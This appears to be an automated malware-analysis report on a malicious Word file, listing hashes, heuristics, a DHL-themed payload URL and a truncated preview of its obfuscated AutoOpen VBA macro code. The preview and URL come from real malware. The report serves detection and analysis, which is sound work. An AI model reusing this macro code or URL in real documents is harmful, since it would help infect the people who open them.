Office (OLE) malware analysis — malicious · 4ba580a6f1e8dc62

MALICIOUS

Office (OLE)

308.5 KB Created: 2018-05-29 10:25:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: 89e748ab6360d66ffcc8e3a23f28beea SHA-1: ef14f51569b25b2fcfa5b910b46b9b183eae318c SHA-256: 4ba580a6f1e8dc626e72f8428e2c8a20dab8da683eee5bdc06c79d242c9230a6

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon document opening. The script utilizes CreateObject, indicating an attempt to instantiate objects for malicious purposes. A URL was extracted which likely serves as a download location for a second-stage payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://my-dhl-invoice.top/text.png In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 87971 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	87971 bytes
SHA-256: `c9d2cd006faf0e9af2ffb44d3f86b65b65b21c7df3aa253476fcd6dab2558cd8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "m7D5mj" Public Function CsFGLV8BaMDQUwy(ByRef OHsYnpM441ZgFB As String, ByRef THREE As String) As String Dim GNvxUQppp0zKOvx() As Byte If Application.UserName = "LaM7U3jaowj" Then MsgBox ("Pp75VBldk7Q") Else Dim e5gNKrWDTWi7mX As Integer End If If Application.UserName = "uTQZASLC81c" Then MsgBox ("AWc4Aw1pCis") Else Dim UvxzACzgHuiuFc As Integer End If Dim uAK9cNPvpWjXX1dQff() As Byte Dim UXH2EJAtwWm2UV, KsEKIepTKra As Integer UXH2EJAtwWm2UV = 8 KsEKIepTKra = 4 #If SLMY0QdcHJD <> 0 Then SLMY0QdcHJD = SLMY0QdcHJD + 9 Dim ucycqbmeofd As Variant Else Dim ucycqbmeofd As Object #End If If UXH2EJAtwWm2UV > KsEKIepTKra Then For LAqv7dK1EMabs7 = KsEKIepTKra To UXH2EJAtwWm2UV KsEKIepTKra = KsEKIepTKra / UXH2EJAtwWm2UV Next LAqv7dK1EMabs7 End If If Chr(Tan(CDbl(1.55829697777553))) = P Then Dim qlWqyNqpD528Ms As String Dim ET9RPE0dBGe As String ET9RPE0dBGe = tGrYeEQB12K qlWqyNqpD528Ms = ezVoXgXfx9l End If If (StrComp(qlWqyNqpD528Ms, ET9RPE0dBGe, vbTextCompare) <> 0) Then MsgBox ("gxzKI7HSUjQL6G") End If Dim akrXpTG47L8No6, JK0KWkL8zDo As Integer akrXpTG47L8No6 = 1 JK0KWkL8zDo = 4 #If oHDfqHFdgKV <> 0 Then oHDfqHFdgKV = oHDfqHFdgKV + 3 Dim q9EmXqWVWsF As Variant Else Dim q9EmXqWVWsF As Object #End If If akrXpTG47L8No6 > JK0KWkL8zDo Then For zFYtjjYShznt3L = JK0KWkL8zDo To akrXpTG47L8No6 JK0KWkL8zDo = JK0KWkL8zDo / akrXpTG47L8No6 Next zFYtjjYShznt3L End If Dim LniKPKbUSFRd87N As String LniKPKbUSFRd87N = Application.UserName Dim NB2cxMz5V6zMCERUf, NAvvHTDF8xQggUkYLs0 As Integer NAvvHTDF8xQggUkYLs0 = Len(LniKPKbUSFRd87N) Dim Sp3IQLm6S2MgKN7t As Collection While NAvvHTDF8xQggUkYLs0 > 2 NB2cxMz5V6zMCERUf = NB2cxMz5V6zMCERUf + 6 NAvvHTDF8xQggUkYLs0 = NAvvHTDF8xQggUkYLs0 - 1 Wend Dim k8GqHzht15XKZz As Object Dim rSdPTFT4cSXG7LG As String rSdPTFT4cSXG7LG = Application.UserName Dim tkX2U5iOTuW7YtHHM, JVKKGxc14KOohJkTo52 As Integer JVKKGxc14KOohJkTo52 = Len(rSdPTFT4cSXG7LG) Dim zHtO8ZJNzw84oydm As Collection While JVKKGxc14KOohJkTo52 > 9 tkX2U5iOTuW7YtHHM = tkX2U5iOTuW7YtHHM + 9 JVKKGxc14KOohJkTo52 = JVKKGxc14KOohJkTo52 - 1 Wend Dim ARPTL475WaKVtU As Long Dim H3a5TxkBwYTUHQ, JDsKeIzLlGP As String H3a5TxkBwYTUHQ = 7 JDsKeIzLlGP = 1 #If H3a5TxkBwYTUHQ > JDsKeIzLlGP Then Dim NvRZsLTWxpy As Object #Else Dim NvRZsLTWxpy As Integer NvRZsLTWxpy = 7 + 1 Dim G9QJ8zMTw53 As Integer For QcfPZqFb7RT = G9QJ8zMTw53 To H3a5TxkBwYTUHQ G9QJ8zMTw53 = G9QJ8zMTw53 + CInt(Chr(Tan(CDbl(1.55039099610836)))) Next QcfPZqFb7RT #End If Dim Xx4cwmQXrgyTOG As Integer Dim jLIHv7lsEkg As String Xx4cwmQXrgyTOG = 4975 Dim aW6c9A9Vpmd As Integer jLIHv7lsEkg = Right(CStr(Xx4cwmQXrgyTOG), Chr(Tan(CDbl(1.55039099610836)))) aW6c9A9Vpmd = CInt(jLIHv7lsEkg) For kmZXr541HZp = aW6c9A9Vpmd To 65 Xx4cwmQXrgyTOG = Xx4cwmQXrgyTOG + 9 Next kmZXr541HZp Dim IGF3h10cI1QipX, yojeH0kQ3om As Integer IGF3h10cI1QipX = 2 yojeH0kQ3om = 7 #If tKnrXMVxYR3 <> 0 Then tKnrXMVxYR3 = tKnrXMVxYR3 + 7 Dim pALfxp9eunq As Variant Else Dim pALfxp9eunq As Object #End If If IGF3h10cI1QipX > yojeH0kQ3om Then For wecKwMd23NaQpr = yojeH0kQ3om To IGF3h10cI1QipX yojeH0kQ3om = yojeH0kQ3om / IGF3h10cI1QipX Next wecKwMd23NaQpr End If Dim oXusYd0zyX9CiG, DwZtml6j3iw As String oXusYd0zyX9CiG = 9 DwZtml6j3iw = 5 #If oXusYd0zyX9CiG > DwZtml6j3iw Then Dim s1bCVkZqjCh As Object #Else Dim s1bCVkZqjCh As Integer s1bCVkZqjCh = 9 + 5 Dim iHBJvpvE7iQ As Integer For VNqCS26TNdL = iHBJvpvE7iQ To oXusYd0zyX9CiG iHBJvpvE7iQ = iHBJvpvE7iQ + CInt(Chr(Tan(CDbl(1.55039099610836)))) Next VNqCS26TNdL #End If Dim wTRXMQVqjtkZGC As Object If Application.UserName = "Ap3U3nVcOxF" Then MsgBox ("SwoaT59YsKw") Else Dim cx6Qg5jAWnCPMO As Integer End If Dim vm4bEVQKttkNXkt As String vm4bEVQKttkNXkt = Application.UserName D ... (truncated)

SHA-256: c9d2cd006faf0e9af2ffb44d3f86b65b65b21c7df3aa253476fcd6dab2558cd8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "m7D5mj"
Public Function CsFGLV8BaMDQUwy(ByRef OHsYnpM441ZgFB As String, ByRef THREE As String) As String
Dim GNvxUQppp0zKOvx() As Byte
If Application.UserName = "LaM7U3jaowj" Then
MsgBox ("Pp75VBldk7Q")
Else
Dim e5gNKrWDTWi7mX As Integer
End If
If Application.UserName = "uTQZASLC81c" Then
MsgBox ("AWc4Aw1pCis")
Else
Dim UvxzACzgHuiuFc As Integer
End If
Dim uAK9cNPvpWjXX1dQff() As Byte
Dim UXH2EJAtwWm2UV, KsEKIepTKra As Integer
UXH2EJAtwWm2UV = 8
KsEKIepTKra = 4
#If SLMY0QdcHJD <> 0 Then
SLMY0QdcHJD = SLMY0QdcHJD + 9
Dim ucycqbmeofd As Variant
Else
Dim ucycqbmeofd As Object
#End If
If UXH2EJAtwWm2UV > KsEKIepTKra Then
For LAqv7dK1EMabs7 = KsEKIepTKra To UXH2EJAtwWm2UV
KsEKIepTKra = KsEKIepTKra / UXH2EJAtwWm2UV
Next LAqv7dK1EMabs7
End If
If Chr(Tan(CDbl(1.55829697777553))) = P Then
Dim qlWqyNqpD528Ms As String
Dim ET9RPE0dBGe As String
ET9RPE0dBGe = tGrYeEQB12K
qlWqyNqpD528Ms = ezVoXgXfx9l
End If
If (StrComp(qlWqyNqpD528Ms, ET9RPE0dBGe, vbTextCompare) <> 0) Then
MsgBox ("gxzKI7HSUjQL6G")
End If
Dim akrXpTG47L8No6, JK0KWkL8zDo As Integer
akrXpTG47L8No6 = 1
JK0KWkL8zDo = 4
#If oHDfqHFdgKV <> 0 Then
oHDfqHFdgKV = oHDfqHFdgKV + 3
Dim q9EmXqWVWsF As Variant
Else
Dim q9EmXqWVWsF As Object
#End If
If akrXpTG47L8No6 > JK0KWkL8zDo Then
For zFYtjjYShznt3L = JK0KWkL8zDo To akrXpTG47L8No6
JK0KWkL8zDo = JK0KWkL8zDo / akrXpTG47L8No6
Next zFYtjjYShznt3L
End If
Dim LniKPKbUSFRd87N As String
LniKPKbUSFRd87N = Application.UserName
Dim NB2cxMz5V6zMCERUf, NAvvHTDF8xQggUkYLs0 As Integer
NAvvHTDF8xQggUkYLs0 = Len(LniKPKbUSFRd87N)
Dim Sp3IQLm6S2MgKN7t As Collection
While NAvvHTDF8xQggUkYLs0 > 2
NB2cxMz5V6zMCERUf = NB2cxMz5V6zMCERUf + 6
NAvvHTDF8xQggUkYLs0 = NAvvHTDF8xQggUkYLs0 - 1
Wend
Dim k8GqHzht15XKZz As Object
Dim rSdPTFT4cSXG7LG As String
rSdPTFT4cSXG7LG = Application.UserName
Dim tkX2U5iOTuW7YtHHM, JVKKGxc14KOohJkTo52 As Integer
JVKKGxc14KOohJkTo52 = Len(rSdPTFT4cSXG7LG)
Dim zHtO8ZJNzw84oydm As Collection
While JVKKGxc14KOohJkTo52 > 9
tkX2U5iOTuW7YtHHM = tkX2U5iOTuW7YtHHM + 9
JVKKGxc14KOohJkTo52 = JVKKGxc14KOohJkTo52 - 1
Wend
Dim ARPTL475WaKVtU As Long
Dim H3a5TxkBwYTUHQ, JDsKeIzLlGP As String
H3a5TxkBwYTUHQ = 7
JDsKeIzLlGP = 1
#If H3a5TxkBwYTUHQ > JDsKeIzLlGP Then
Dim NvRZsLTWxpy As Object
#Else
Dim NvRZsLTWxpy As Integer
NvRZsLTWxpy = 7 + 1
Dim G9QJ8zMTw53 As Integer
For QcfPZqFb7RT = G9QJ8zMTw53 To H3a5TxkBwYTUHQ
G9QJ8zMTw53 = G9QJ8zMTw53 + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next QcfPZqFb7RT
#End If
Dim Xx4cwmQXrgyTOG As Integer
Dim jLIHv7lsEkg As String
Xx4cwmQXrgyTOG = 4975
Dim aW6c9A9Vpmd As Integer
jLIHv7lsEkg = Right(CStr(Xx4cwmQXrgyTOG), Chr(Tan(CDbl(1.55039099610836))))
aW6c9A9Vpmd = CInt(jLIHv7lsEkg)
For kmZXr541HZp = aW6c9A9Vpmd To 65
Xx4cwmQXrgyTOG = Xx4cwmQXrgyTOG + 9
Next kmZXr541HZp
Dim IGF3h10cI1QipX, yojeH0kQ3om As Integer
IGF3h10cI1QipX = 2
yojeH0kQ3om = 7
#If tKnrXMVxYR3 <> 0 Then
tKnrXMVxYR3 = tKnrXMVxYR3 + 7
Dim pALfxp9eunq As Variant
Else
Dim pALfxp9eunq As Object
#End If
If IGF3h10cI1QipX > yojeH0kQ3om Then
For wecKwMd23NaQpr = yojeH0kQ3om To IGF3h10cI1QipX
yojeH0kQ3om = yojeH0kQ3om / IGF3h10cI1QipX
Next wecKwMd23NaQpr
End If
Dim oXusYd0zyX9CiG, DwZtml6j3iw As String
oXusYd0zyX9CiG = 9
DwZtml6j3iw = 5
#If oXusYd0zyX9CiG > DwZtml6j3iw Then
Dim s1bCVkZqjCh As Object
#Else
Dim s1bCVkZqjCh As Integer
s1bCVkZqjCh = 9 + 5
Dim iHBJvpvE7iQ As Integer
For VNqCS26TNdL = iHBJvpvE7iQ To oXusYd0zyX9CiG
iHBJvpvE7iQ = iHBJvpvE7iQ + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next VNqCS26TNdL
#End If
Dim wTRXMQVqjtkZGC As Object
If Application.UserName = "Ap3U3nVcOxF" Then
MsgBox ("SwoaT59YsKw")
Else
Dim cx6Qg5jAWnCPMO As Integer
End If
Dim vm4bEVQKttkNXkt As String
vm4bEVQKttkNXkt = Application.UserName
D
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.